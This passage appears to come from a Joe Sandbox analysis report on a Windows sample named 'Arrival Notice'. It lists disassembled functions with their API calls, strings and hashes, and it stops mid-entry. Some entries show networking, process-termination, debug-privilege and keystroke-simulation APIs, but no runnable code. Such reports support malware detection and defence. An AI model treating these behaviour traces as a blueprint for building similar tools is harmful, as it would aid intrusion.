                  • Opcode Fuzzy Hash: 9a23871e58a0950978b7bb969e586b823647ee7ddf109d6eb8286d812fc9e378
                  • Instruction Fuzzy Hash: 4011C676100158AFCB03EF56D842CDE3BA9FF06350F4256A1F9485F262D735EA609B90
                  Function 003B1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                  Download Yara Rule
                  APIs
                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003B1459
                  • OleUninitialize.OLE32(?,00000000), ref: 003B14F8
                  • UnregisterHotKey.USER32(?), ref: 003B16DD
                  • DestroyWindow.USER32(?), ref: 003F24B9
                  • FreeLibrary.KERNEL32(?), ref: 003F251E
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003F254B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                  • String ID: close all
                  • API String ID: 469580280-3243417748
                  • Opcode ID: d20911e851c82725478fd0d9e1aad652959d63d28e740c8e4823f1bc3c02f925
                  • Instruction ID: 6dbf46c55c7aa6a2b3ab21d9a67109e410641003a6978f6580973d857cd6b554
                  • Opcode Fuzzy Hash: d20911e851c82725478fd0d9e1aad652959d63d28e740c8e4823f1bc3c02f925
                  • Instruction Fuzzy Hash: 2ED19131702212CFDB2AEF15C4A5B69F7A4BF05704F5541AEEA4AAB661CB30EC12CF54
                  Function 003B5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                  Download Yara Rule
                  APIs
                  • SetWindowLongW.USER32(?,000000EB), ref: 003B5C7A
                    • Part of subcall function 003B5D0A: GetClientRect.USER32(?,?), ref: 003B5D30
                    • Part of subcall function 003B5D0A: GetWindowRect.USER32(?,?), ref: 003B5D71
                    • Part of subcall function 003B5D0A: ScreenToClient.USER32(?,?), ref: 003B5D99
                  • GetDC.USER32 ref: 003F46F5
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003F4708
                  • SelectObject.GDI32(00000000,00000000), ref: 003F4716
                  • SelectObject.GDI32(00000000,00000000), ref: 003F472B
                  • ReleaseDC.USER32(?,00000000), ref: 003F4733
                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003F47C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                  • String ID: U
                  • API String ID: 4009187628-3372436214
                  • Opcode ID: fc677e4840fa1e1bd99849b0ebf48d416cd19167d317f5c3bdbdb149a02bf807
                  • Instruction ID: 73f95aa042ee5e0ecfb8a74948c7f89b8ded27e9a5270d7ccff9025375c113bc
                  • Opcode Fuzzy Hash: fc677e4840fa1e1bd99849b0ebf48d416cd19167d317f5c3bdbdb149a02bf807
                  • Instruction Fuzzy Hash: 4471F034400209DFCF239F64C984AFB7BB6FF4A364F19426AEE619A266C3318845DF50
                  Function 0042359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                  Download Yara Rule
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004235E4
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • LoadStringW.USER32(00482390,?,00000FFF,?), ref: 0042360A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-2391861430
                  • Opcode ID: 229e3a85728a069ec867186ee69339a0534c5810b6df95df954ef307bf7e24de
                  • Instruction ID: ed557dc14541cfcd92895bfae8ca71481c883f6a77a2774ac585c67867556fa0
                  • Opcode Fuzzy Hash: 229e3a85728a069ec867186ee69339a0534c5810b6df95df954ef307bf7e24de
                  • Instruction Fuzzy Hash: 2551C271900219BBDF16EFA0DC82EEEBB79AF04305F54412AF605761A1DB381B89DF64
                  Function 0042C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0042C272
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0042C29A
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0042C2CA
                  • GetLastError.KERNEL32 ref: 0042C322
                  • SetEvent.KERNEL32(?), ref: 0042C336
                  • InternetCloseHandle.WININET(00000000), ref: 0042C341
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                  • String ID:
                  • API String ID: 3113390036-3916222277
                  • Opcode ID: af3a75dcbad2805c5ad75cd35eb8354f93f7da6261cb191a61eba0fe73de84ca
                  • Instruction ID: e348c8cf6aa10b71aa732f2fb69dfab264457aaab9c8feccf00bc1368b577dd3
                  • Opcode Fuzzy Hash: af3a75dcbad2805c5ad75cd35eb8354f93f7da6261cb191a61eba0fe73de84ca
                  • Instruction Fuzzy Hash: 3431D171600614AFD721DF65ACC4AAF7BFCEB09344B44892EF84693200DB78DC048BA9
                  Function 0041989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003F3AAF,?,?,Bad directive syntax error,0044CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004198BC
                  • LoadStringW.USER32(00000000,?,003F3AAF,?), ref: 004198C3
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00419987
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HandleLoadMessageModuleString_wcslen
                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                  • API String ID: 858772685-4153970271
                  • Opcode ID: 07c5df791042ca0a78efca46b8540cd6f1e696f77ea5fecf34ec0f96ed1b1676
                  • Instruction ID: 03a10761e1435c154a7af38fd6026092dc3e4568abe9caeae85ffdd255a0fbb0
                  • Opcode Fuzzy Hash: 07c5df791042ca0a78efca46b8540cd6f1e696f77ea5fecf34ec0f96ed1b1676
                  • Instruction Fuzzy Hash: 8221943190021EBBCF16AF90CC56FEE7775FF14304F04446AF6196A0A2EB359A58CB55
                  Function 0041209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32 ref: 004120AB
                  • GetClassNameW.USER32(00000000,?,00000100), ref: 004120C0
                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0041214D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameParentSend
                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                  • API String ID: 1290815626-3381328864
                  • Opcode ID: f4c8f8e2adea624f590c1dafd8ab0099a133652bc223985371dd13d21640416f
                  • Instruction ID: 1f82a89b7f70e028907161c72be3631bf386f394759235610ee798f9b37e2623
                  • Opcode Fuzzy Hash: f4c8f8e2adea624f590c1dafd8ab0099a133652bc223985371dd13d21640416f
                  • Instruction Fuzzy Hash: 0111E77B684707BAF605A620EC06DFB379CDB05324B304127FB08ED1D1EAE968A2551C
                  Function 003ECE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                  • String ID:
                  • API String ID: 1282221369-0
                  • Opcode ID: 1596b92aa821526b1e69cbf47881fb921b24d586eadb9620b01799b150cc0534
                  • Instruction ID: 54bf7503dce054ab4322565042f53205ac7bd2e78f317b81313191c3dffceb9f
                  • Opcode Fuzzy Hash: 1596b92aa821526b1e69cbf47881fb921b24d586eadb9620b01799b150cc0534
                  • Instruction Fuzzy Hash: DF614B729143B4AFDB23AFB69881A6E7BD9AF05310F06476DF9409B2C2D7319D038750
                  Function 004450D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00445186
                  • ShowWindow.USER32(?,00000000), ref: 004451C7
                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 004451CD
                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 004451D1
                    • Part of subcall function 00446FBA: DeleteObject.GDI32(00000000), ref: 00446FE6
                  • GetWindowLongW.USER32(?,000000F0), ref: 0044520D
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044521A
                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0044524D
                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00445287
                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00445296
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                  • String ID:
                  • API String ID: 3210457359-0
                  • Opcode ID: f9ba2146aa072bcb97d837218840156da155b6f150f8641ddcc1f82cda58b35d
                  • Instruction ID: e9c63f37f870348f2be02eb93eb7e89bc4219d63bf7280117bda603af5b0f44f
                  • Opcode Fuzzy Hash: f9ba2146aa072bcb97d837218840156da155b6f150f8641ddcc1f82cda58b35d
                  • Instruction Fuzzy Hash: 7651A230A41A08BFFF209F24CC49BDA3B65FB05325F148057F6159A2E2C7B9A981DF49
                  Function 003C8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00406890
                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004068A9
                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004068B9
                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004068D1
                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004068F2
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003C8874,00000000,00000000,00000000,000000FF,00000000), ref: 00406901
                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0040691E
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003C8874,00000000,00000000,00000000,000000FF,00000000), ref: 0040692D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                  • String ID:
                  • API String ID: 1268354404-0
                  • Opcode ID: 1769bc82d4f927854ccc7804c84dbc052a77c1cd677f968d82f22980f72316cd
                  • Instruction ID: c2df7eed8063eb1a6917c19db08708874fb8feb9f5dc85e13520d49074141f56
                  • Opcode Fuzzy Hash: 1769bc82d4f927854ccc7804c84dbc052a77c1cd677f968d82f22980f72316cd
                  • Instruction Fuzzy Hash: 6F5186B0600209AFDB219F25CC95FAA7BB9EB48310F11452DF902E62A0DB74EE91CB54
                  Function 0042C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0042C182
                  • GetLastError.KERNEL32 ref: 0042C195
                  • SetEvent.KERNEL32(?), ref: 0042C1A9
                    • Part of subcall function 0042C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0042C272
                    • Part of subcall function 0042C253: GetLastError.KERNEL32 ref: 0042C322
                    • Part of subcall function 0042C253: SetEvent.KERNEL32(?), ref: 0042C336
                    • Part of subcall function 0042C253: InternetCloseHandle.WININET(00000000), ref: 0042C341
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                  • String ID:
                  • API String ID: 337547030-0
                  • Opcode ID: 5802c32758a7eb6f27250652e35110b42b8dfed041e87d2ca7c9a99516d67b6e
                  • Instruction ID: 9a116f9ed6499e3bc4153896711a465b7670d648ff2caa74dd56046b5da11722
                  • Opcode Fuzzy Hash: 5802c32758a7eb6f27250652e35110b42b8dfed041e87d2ca7c9a99516d67b6e
                  • Instruction Fuzzy Hash: 4831B075A01611EFDB208FA5EC84A7BBBE9FF15300B44442EF94683210DB35E8109FA5
                  Function 004125A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00413A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00413A57
                    • Part of subcall function 00413A3D: GetCurrentThreadId.KERNEL32 ref: 00413A5E
                    • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 004125BD
                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004125DB
                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004125DF
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 004125E9
                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00412601
                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00412605
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0041260F
                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00412623
                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00412627
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                  • String ID:
                  • API String ID: 2014098862-0
                  • Opcode ID: efea093be5c013b95220df7ecd8b53802dc810aadc59b434ce54661d7d9d4fb8
                  • Instruction ID: 4899a6fb0d350c47be125b93783cc2f04327ccf893addce746cdefa0e7e7b8fb
                  • Opcode Fuzzy Hash: efea093be5c013b95220df7ecd8b53802dc810aadc59b434ce54661d7d9d4fb8
                  • Instruction Fuzzy Hash: 8E01D430391210BBFB106B699CCAF993F59DF4EB52F100016F318AE0D1C9E224848EAE
                  Function 00411803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00411449,?,?,00000000), ref: 0041180C
                  • HeapAlloc.KERNEL32(00000000,?,00411449,?,?,00000000), ref: 00411813
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00411449,?,?,00000000), ref: 00411828
                  • GetCurrentProcess.KERNEL32(?,00000000,?,00411449,?,?,00000000), ref: 00411830
                  • DuplicateHandle.KERNEL32(00000000,?,00411449,?,?,00000000), ref: 00411833
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00411449,?,?,00000000), ref: 00411843
                  • GetCurrentProcess.KERNEL32(00411449,00000000,?,00411449,?,?,00000000), ref: 0041184B
                  • DuplicateHandle.KERNEL32(00000000,?,00411449,?,?,00000000), ref: 0041184E
                  • CreateThread.KERNEL32(00000000,00000000,00411874,00000000,00000000,00000000), ref: 00411868
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                  • String ID:
                  • API String ID: 1957940570-0
                  • Opcode ID: 19bf8cacaaf99161d8716750727cb8438ccb54d781c8df98d9a1abe571d55500
                  • Instruction ID: 9ccecfd3b6bd379a1d1c6012f95ccf5806400509f0dbae678c083d6ef8d9f5f5
                  • Opcode Fuzzy Hash: 19bf8cacaaf99161d8716750727cb8438ccb54d781c8df98d9a1abe571d55500
                  • Instruction Fuzzy Hash: 4F01AC75241304BFE650ABA5DC89F573B6CEB8AB11F044421FA05DB1A1C6749C008F24
                  Function 0043A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0041D501
                    • Part of subcall function 0041D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0041D50F
                    • Part of subcall function 0041D4DC: CloseHandle.KERNEL32(00000000), ref: 0041D5DC
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043A16D
                  • GetLastError.KERNEL32 ref: 0043A180
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043A1B3
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043A268
                  • GetLastError.KERNEL32(00000000), ref: 0043A273
                  • CloseHandle.KERNEL32(00000000), ref: 0043A2C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                  • String ID: SeDebugPrivilege
                  • API String ID: 2533919879-2896544425
                  • Opcode ID: 8ded361650bfbde03106d56f419ac7a7aea05f5717ae71778006fedfd2ab3e4e
                  • Instruction ID: 2d0414676ee86f54c760025f1269954b420b7627d97b752695abbdd9795bb147
                  • Opcode Fuzzy Hash: 8ded361650bfbde03106d56f419ac7a7aea05f5717ae71778006fedfd2ab3e4e
                  • Instruction Fuzzy Hash: 3A61BF342442429FD720DF15C494F66BBE1AF48318F18849DE4A68FBA3C77AEC45CB96
                  Function 00443886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00443925
                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0044393A
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00443954
                  • _wcslen.LIBCMT ref: 00443999
                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 004439C6
                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004439F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$Window_wcslen
                  • String ID: SysListView32
                  • API String ID: 2147712094-78025650
                  • Opcode ID: 7a96ad779160243f7b108113637aff4379f2bac6035113b89176ef06d8515872
                  • Instruction ID: 75e1a4c6a3c4a8fbca05aed3e61d89afc2e47cf3e8e65431971761136e42d0ef
                  • Opcode Fuzzy Hash: 7a96ad779160243f7b108113637aff4379f2bac6035113b89176ef06d8515872
                  • Instruction Fuzzy Hash: 5E41C371A00218ABEF219F64CC45BEB7BA9EF08750F10052BF958E7281D7759D80CB94
                  Function 0041BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0041BCFD
                  • IsMenu.USER32(00000000), ref: 0041BD1D
                  • CreatePopupMenu.USER32 ref: 0041BD53
                  • GetMenuItemCount.USER32(010E64B8), ref: 0041BDA4
                  • InsertMenuItemW.USER32(010E64B8,?,00000001,00000030), ref: 0041BDCC
                  Strings
                  Memory Dump Source
